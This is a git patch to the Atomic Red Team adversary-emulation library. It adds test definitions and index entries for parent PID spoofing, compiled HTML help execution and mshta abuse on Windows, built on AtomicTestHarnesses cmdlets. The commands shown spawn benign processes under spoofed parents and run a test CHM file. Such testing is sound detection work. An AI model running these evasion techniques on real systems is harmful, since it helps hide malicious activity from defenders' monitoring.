From c8f43265c78d826080f62d8a8dfc4d6874f563e8 Mon Sep 17 00:00:00 2001 From: Michael Haag Date: Thu, 22 Oct 2020 14:34:31 -0600 Subject: [PATCH] Introducing AtomicTestHarnesses Tests to ART (#1270) * Introduce AtomicTestHarness Tests to ART Adding: - T1134.004 - Access Token Manipulation: Parent PID Spoofing - T1218.001 - Signed Binary Proxy Execution: Compiled HTML File - T1218.005 - Signed Binary Proxy Execution: Mshta These tests utilize the recently released [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses) to simulate the base tests from from each ATH Harness. Input arguments may be manipulated as needed to enhance simulation. * Generate docs from job=validate_atomics_generate_docs branch=atomictestharness-tests Co-authored-by: CircleCI Atomic Red Team doc generator --- atomics/Indexes/Indexes-CSV/index.csv | 19 + atomics/Indexes/Indexes-CSV/windows-index.csv | 19 + atomics/Indexes/Indexes-Markdown/index.md | 19 + .../Indexes/Indexes-Markdown/windows-index.md | 19 + atomics/Indexes/index.yaml | 614 ++++++++++++++++++ atomics/T1134.004/T1134.004.md | 186 ++++++ atomics/T1134.004/T1134.004.yaml | 111 ++++ atomics/T1218.001/T1218.001.md | 235 +++++++ atomics/T1218.001/T1218.001.yaml | 149 +++++ atomics/T1218.005/T1218.005.md | 278 ++++++++ atomics/T1218.005/T1218.005.yaml | 164 +++++ atomics/used_guids.txt | 15 + 12 files changed, 1828 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index df30d489..ac1ca6d0 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -38,6 +38,10 @@ privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell @@ -245,6 +249,11 @@ defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt +defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell +defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell +defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell +defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell +defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt @@ -339,6 +348,12 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell +defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell +defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell +defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell +defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell +defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell +defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt @@ -355,6 +370,10 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell +defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell +defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell +defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell +defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 03989321..d7f2c379 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -25,6 +25,10 @@ privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Glo privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell +privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell @@ -74,6 +78,11 @@ defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt +defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell +defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell +defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell +defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell +defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt @@ -132,6 +141,12 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell +defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell +defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell +defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell +defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell +defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell +defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt @@ -147,6 +162,10 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell +defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell +defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell +defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell +defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c3805661..fd0c9ef3 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -89,6 +89,10 @@ - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] + - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] + - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] + - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] + - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] - T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -499,6 +503,11 @@ - [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md) - Atomic Test #1: Compiled HTML Help Local Payload [windows] - Atomic Test #2: Compiled HTML Help Remote Payload [windows] + - Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows] + - Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows] + - Atomic Test #5: Invoke CHM Simulate Double click [windows] + - Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows] + - Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows] - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1218.002 Control Panel](../../T1218.002/T1218.002.md) - Atomic Test #1: Control Panel Items [windows] @@ -650,6 +659,12 @@ - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] + - Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows] + - Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows] + - Atomic Test #6: Invoke HTML Application - Direct download from URI [windows] + - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] + - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] + - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] @@ -672,6 +687,10 @@ - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] + - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] + - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] + - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] + - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] - [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md) - Atomic Test #1: Mimikatz Pass the Hash [windows] - Atomic Test #2: crackmapexec Pass the Hash [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index a067f6b0..8e5be8f7 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -62,6 +62,10 @@ - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] + - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] + - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] + - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] + - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] - T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -153,6 +157,11 @@ - [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md) - Atomic Test #1: Compiled HTML Help Local Payload [windows] - Atomic Test #2: Compiled HTML Help Remote Payload [windows] + - Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows] + - Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows] + - Atomic Test #5: Invoke CHM Simulate Double click [windows] + - Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows] + - Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows] - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1218.002 Control Panel](../../T1218.002/T1218.002.md) - Atomic Test #1: Control Panel Items [windows] @@ -255,6 +264,12 @@ - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] + - Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows] + - Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows] + - Atomic Test #6: Invoke HTML Application - Direct download from URI [windows] + - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] + - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] + - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] @@ -276,6 +291,10 @@ - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] + - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] + - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] + - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] + - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] - [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md) - Atomic Test #1: Mimikatz Pass the Hash [windows] - Atomic Test #2: crackmapexec Pass the Hash [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8ab000e2..aadbbec2 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -4496,6 +4496,134 @@ privilege-escalation: Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore name: powershell + - name: Parent PID Spoofing - Spawn from Current Process + auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 + description: Spawns a powershell.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine + ''#{command_line}'' -ParentId #{parent_pid}' + name: powershell + - name: Parent PID Spoofing - Spawn from Specified Process + auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb + description: Spawns a notepad.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + test_guid: + description: Defined test GUID + type: string + default: 12345678-1234-1234-1234-123456789123 + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid + #{test_guid}' + name: powershell + - name: Parent PID Spoofing - Spawn from svchost.exe + auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 + description: Spawnd a process as a child of the first accessible svchost.exe + process. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, + ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | + Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} + -CommandLine ''#{command_line}''' + name: powershell + - name: Parent PID Spoofing - Spawn from New Process + auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db + description: Creates a notepad.exe process and then spawns a powershell.exe + process as a child of it. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_name: + description: Parent process to spoof from + type: path + default: "$Env:windir\\System32\\notepad.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent + -FilePath #{file_path} -CommandLine ''#{command_line}''' + name: powershell T1034: technique: id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02 @@ -22968,6 +23096,174 @@ defense-evasion: ' name: command_prompt + - name: Invoke CHM with default Shortcut Command Execution + auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 + description: Executes a CHM file with the default Shortcut Command method. + supported_platforms: + - windows + input_arguments: + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + hh_file_path: + description: path of modified HH.exe + type: path + default: "$env:windir\\hh.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath + #{chm_file_path}' + name: powershell + - name: Invoke CHM with InfoTech Storage Protocol Handler + auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 + description: Executes a CHM file with the ITS protocol handler. + supported_platforms: + - windows + input_arguments: + hh_file_path: + description: path of modified HH.exe + type: path + default: "$env:windir\\hh.exe" + infotech_storage_handler: + description: Default InfoTech Storage Protocol Handler + type: string + default: its + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} + -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' + name: powershell + - name: Invoke CHM Simulate Double click + auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a + description: Executes a CHM file simulating a user double click. + supported_platforms: + - windows + input_arguments: + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' + name: powershell + - name: Invoke CHM with Script Engine and Help Topic 